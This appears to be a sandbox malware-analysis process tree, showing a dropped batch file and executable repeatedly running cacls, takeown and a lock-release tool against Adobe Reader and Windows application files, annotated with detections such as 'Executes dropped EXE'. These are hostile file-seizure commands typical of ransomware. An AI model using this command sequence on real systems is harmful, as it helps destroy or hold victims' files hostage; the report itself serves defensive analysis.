C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:1184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "cryptocme2.sig" -nobanner3⤵
- Loads dropped DLL
PID:848 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "cryptocme2.sig" -nobanner4⤵
- Executes dropped EXE
PID:832
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui""2⤵
- Loads dropped DLL
PID:1588 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\JNTFiltr.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""2⤵
- Loads dropped DLL
PID:1744 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui" /E /G Admin:F /C3⤵PID:1612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1812
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui""2⤵
- Loads dropped DLL
PID:1196 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:680 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1172
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui""2⤵
- Loads dropped DLL
PID:1740 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C3⤵PID:1124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Music.jtp" -nobanner3⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Music.jtp" -nobanner4⤵
- Executes dropped EXE
PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1648
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui""2⤵PID:620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Journal.exe""2⤵PID:1104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C3⤵PID:1616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Journal.exe" -nobanner3⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Journal.exe" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵PID:1784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Seyes.jtp" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Seyes.jtp" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui""2⤵PID:1972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:2004
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1612
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1856
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1120
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵PID:1688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1324
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:1784
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵PID:1160
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui""2⤵PID:1776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui""2⤵PID:628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:1104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:1784
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Genko_1.jtp" -nobanner3⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Genko_1.jtp" -nobanner4⤵PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "email_all.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "email_all.gif" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:324
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "rss.gif" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "rss.gif" -nobanner4⤵PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵
- Modifies file permissions
PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:1844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1444
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SY______.PFM" -nobanner3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SY______.PFM" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:848
-
